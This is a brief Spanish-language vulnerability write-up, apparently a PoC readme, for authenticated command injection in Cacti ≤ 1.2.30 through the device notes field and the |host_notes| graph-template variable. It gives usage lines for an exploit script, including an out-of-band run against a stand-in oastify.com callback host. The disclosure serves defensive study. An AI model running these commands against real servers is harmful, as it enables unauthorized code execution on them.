
Cacti ≤ 1.2.30 Auth RCE - Inyección de variable host
Una vulnerabilidad de inyección de comandos del sistema operativo en Cacti ≤ 1.2.30 permite a cualquier usuario autenticado con privilegios de creación de plantillas de dispositivos y gráficas ejecutar comandos arbitrarios en el servidor subyacente. La falla existe porque los campos de metadatos del host controlados por el usuario (específicamente el campo de notas del dispositivo) se sustituyen en los argumentos de línea de comandos de RRDtool mediante el motor de reemplazo de variables de Cacti sin ningún tipo de saneamiento o escape. Un atacante puede inyectar metacaracteres de shell en el campo de notas, crear una plantilla de gráfica que haga referencia a la variable |host_notes| y provocar el renderizado de la gráfica para lograr la ejecución remota de código completa como el usuario del servidor web.
python3 cacti_rce_poc.py --url http://target/cacti --user admin --pass admin --cmd 'id'
Ejecución de comandos OOB:
python3 cacti_rce_poc.py --url http://target/cacti --user admin --pass admin --oob your.oastify.com

